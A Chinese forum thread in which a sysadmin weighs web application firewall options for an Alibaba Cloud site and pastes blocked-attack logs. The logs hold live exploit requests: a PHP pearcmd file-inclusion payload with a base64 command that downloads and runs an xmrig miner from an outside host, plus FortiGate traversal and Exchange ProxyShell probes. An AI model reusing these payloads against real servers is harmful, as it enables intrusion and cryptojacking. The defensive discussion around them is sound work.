前置linux不太现实,因为现在是 阿里云的负载均衡来的。。。再搞一台linux怕不是扛不住。只能想想办法上个waf
阿里云有的,得花好多钱就是了。而且我这是国际版阿里云,更贵
我去瞅一眼大善人家的waf
default 远程代码执行漏洞攻击 100.122.22.102 /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("cGtpbGwgLTkgLmZveG07IHdnZXQgaHR0cDovL2Rvd25sb2FkLmFzeW5jZm94Lnh5ei9kb3dubG9hZC94bXJpZy54ODZfNjQ7IGN1cmwgLU8gaHR0cDovL2Rvd25sb2FkLmFzeW5jZm94Lnh5ei9kb3dubG9hZC94bXJpZy54ODZfNjQ7IG12IHhtcmlnLng4Nl82NCAuZm94bTsgY2htb2QgK3ggLmZveG07IC4vLmZveG07"));?>+/tmp/ohhellohttpserver.php 2024-03-04 07:00:08 404 1
default 文件包含漏洞攻击 100.122.22.8 /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/var/tmp/index1.php 2024-03-05 04:20:56 404 1
default 敏感目录访问 100.122.21.199 /api/config/getwebsitename 2024-03-05 13:51:14 404 1
default 敏感目录访问 100.122.22.26 /api/config/getkefu 2024-03-05 13:51:12 404 1
default 远程代码执行漏洞攻击 100.122.21.149 /autodiscover/autodiscover.json?@zdi/Powershell 2024-03-05 13:51:05 404 1
default 远程代码执行漏洞攻击 100.122.22.9 /sitecore/shell/sitecore.version.xml 2024-03-05 14:54:46 404 1
default 敏感目录访问 100.122.22.98 /cgi-bin/authLogin.cgi 2024-03-05 01:49:37 404 1
default 敏感目录访问 100.122.21.193 /mytio/config/base 2024-03-05 13:51:11 404 1
default 敏感目录访问 100.122.22.10 /api/config/info 2024-03-04 06:32:34 404 1
default 敏感目录访问 100.122.22.95 /cgi-bin/authLogin.cgi 2024-03-05 00:03:52 404 1
default 敏感目录访问 100.122.22.10 /api/config/getwebsitename 2024-03-04 06:32:24 404 1
default 文件包含漏洞攻击 100.122.21.196 /index.php?lang=../../../../../../../../var/tmp/index1 2024-03-05 09:22:53 404 1
default 文件包含漏洞攻击 100.122.21.199 /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/var/tmp/index1.php 2024-03-05 09:22:52 404 1
default 文件包含漏洞攻击 100.122.21.145 /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 2024-03-05 15:40:00 404 1
default 敏感目录访问 100.122.22.94 /api/config/getwebsitename 2024-03-05 12:08:26 404 1
default 文件包含漏洞攻击 100.122.21.198 /index.php?lang=../../../../../../../../var/tmp/index1 2024-03-05 00:35:10 404 1
default 敏感目录访问 100.122.22.31 /api/config/getkefu 2024-03-05 13:50:59 404 1
default 敏感目录访问 100.122.22.87 /mytio/config/base 2024-03-05 12:08:19 404 1
default 文件包含漏洞攻击 100.122.22.13 /index.php?lang=../../../../../../../../var/tmp/index1 2024-03-04 13:41:31 404 1
default 敏感目录访问 100.122.22.31 /mytio/config/base 2024-03-05 13:50:59 404 1
哈哈哈,再给大家看一眼我拿星图分析之后的 漏洞攻击
难受哦
直接在cf就拦掉了,根本不会到服务器。
害,接 cf可不得 老板同意嘛。
我先看看日志,有没被攻进来,要是没有,大概率老板是不会让我接cf家的waf的。
你就说攻进去了
害得是吾皇!好手段!
始皇管理上级是有一手
1 个赞
或者你说这次还没功进来。不过攻击消耗了好多服务器资源,也难保下次不会功进来,最好是在外层拦一拦
1 个赞
都已经请求负载均衡了。。。耗资源?给他耗!(经理是这么说的)
1 个赞
中了挖矿了吧,套cfwaf或者长亭的开源的雷池,该打的补丁先打上吧,能直接执行说明你基线配的都有问题,重新配置一下基线吧
大概率要套大善人的waf。搞雷池不太现实。windows的服务器,现在暂时问题不大。但是老板说暂时不搞,那我只能双手一摊
主要是有些国内的软件,大善人的规则不一定覆盖,但是长亭肯定是覆盖的
理想的方案就是前置一台linux服务器,里面搞雷池+nginx负载均衡,那样我还能把阿里云负载均衡撤掉,ssl证书也好搞
1 个赞
有业务的话建议是挂两台,这样不会出现单节点故障
服务器是国外的,阿里云贵到死,客户指定阿里云,估摸着两台linux够呛,它已经买了两台windows,一台linux了